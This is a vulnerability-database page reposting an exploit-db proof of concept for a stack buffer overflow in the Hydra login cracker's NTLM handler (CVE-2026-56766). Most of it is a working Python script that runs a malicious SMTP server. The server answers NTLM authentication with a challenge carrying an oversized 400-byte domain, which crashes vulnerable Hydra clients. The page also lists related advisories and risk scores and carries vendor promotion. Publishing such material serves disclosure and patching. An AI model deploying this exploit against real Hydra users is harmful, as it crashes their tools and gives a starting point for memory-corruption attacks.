Lucene search
K

Hydra - Stack Buffer Overflow

🗓️ 07 Jul 2026 00:00:00Reported by banyamerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 8 Views

NTLM stack overflow in Hydra from long domain (CVE-2026-56766) affecting up to version 9.7.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-56766
25 Jun 202618:01
attackerkb
Circl
CVE-2026-56766
25 Jun 202623:34
circl
CVE
CVE-2026-56766
25 Jun 202618:01
cve
Cvelist
CVE-2026-56766 Hydra - Stack Buffer Overflow in NTLM Authentication Handler
25 Jun 202618:01
cvelist
EUVD
EUVD-2026-39515
25 Jun 202618:01
euvd
NVD
CVE-2026-56766
25 Jun 202619:16
nvd
OPENSUSE Linux
hydra-9.7+git20.gbccaea1-1.1 on GA media (moderate)
28 Jun 202600:00
opensuse
OSV
OPENSUSE-SU-2026:11131-1 hydra-9.7+git20.gbccaea1-1.1 on GA media
27 Jun 202600:00
osv
OSV
UBUNTU-CVE-2026-56766
25 Jun 202619:16
osv
Packet Storm
📄 Hydra Stack Buffer Overflow
7 Jul 202600:00
packetstorm
Rows per page
# Exploit Title:    Hydra - Stack Buffer Overflow 
# CVE:                   CVE-2026-56766
# Date:                  2026-06-26
# Exploit Author:        Mohammed Idrees Banyamer
# Author Country:        Jordan
# Instagram:             @banyamer_security
# Author GitHub:         https://github.com/mbanyamer
# Author Blog  :         https://banyamersecurity.com/blog/
# Vendor Homepage:       https://github.com/vanhauser-thc/thc-hydra
# Software Link:         https://github.com/vanhauser-thc/thc-hydra
# Affected:              Hydra <= 9.7
# Tested on:             Hydra 9.5 (Ubuntu 22.04)
# Category:              Remote
# Platform:              Linux
# Exploit Type:          Stack Buffer Overflow
# CVSS:                  7.5
# Description:           Malicious NTLM Type-2 challenge with excessively long domain
#                        causes stack buffer overflow in Hydra's NTLM authentication handler
#                        (SMTP, POP3, IMAP, etc. modules).
# Fixed in:              https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
# Usage:
#   python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Notes:
#   • Run this PoC server first, then launch vulnerable Hydra against it.
#   • Triggers SIGSEGV in vulnerable versions.
#
# How to Use
#
# Step 1: Run the exploit server: python3 exploit.py
# Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

import socket
import base64
import struct
import threading
import time
import sys

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE_2 = 2

def create_ntlm_type2_challenge():
    challenge = bytearray(NTLMSSP_SIGNATURE)
    challenge += struct.pack("<I", NTLM_TYPE_2)
    
    domain_name = b"A" * 400
    domain_len = len(domain_name)
    
    flags = 0x00008201
    server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
    reserved = b"\x00" * 8
    target_name_offset = 48
    
    challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
    challenge += struct.pack("<I", flags)
    challenge += server_challenge
    challenge += reserved
    challenge += b"\x00" * 8
    challenge += domain_name
    
    return challenge

class SMTPServer:
    def __init__(self, host='0.0.0.0', port=2525):
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        
    def handle_client(self, client, addr):
        client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
        
        while True:
            try:
                data = client.recv(4096).decode('utf-8', errors='ignore').strip()
                if not data:
                    break
                    
                if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
                    client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
                
                elif data.upper().startswith("AUTH NTLM"):
                    client.send(b"334 NTLM\r\n")
                    
                elif len(data) > 10:
                    type2 = create_ntlm_type2_challenge()
                    b64_type2 = base64.b64encode(type2).decode('ascii')
                    client.send(f"334 {b64_type2}\r\n".encode())
                    
                    time.sleep(1)
                    client.recv(8192)
                    client.send(b"235 Authentication successful (fake)\r\n")
                    break
                
                elif data.upper().startswith("QUIT"):
                    client.send(b"221 Bye\r\n")
                    break
                
            except:
                break
        
        client.close()
    
    def start(self):
        self.sock.bind((self.host, self.port))
        self.sock.listen(5)
        print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
        print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
        
        while True:
            client, addr = self.sock.accept()
            threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()

if __name__ == "__main__":
    banner()
    try:
        server = SMTPServer()
        server.start()
    except KeyboardInterrupt:
        print("\n[+] Server stopped")
    except Exception as e:
        print(f"[-] Error: {e}")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 48.6
CVSS 3.18.8
EPSS0.00474
SSVC
8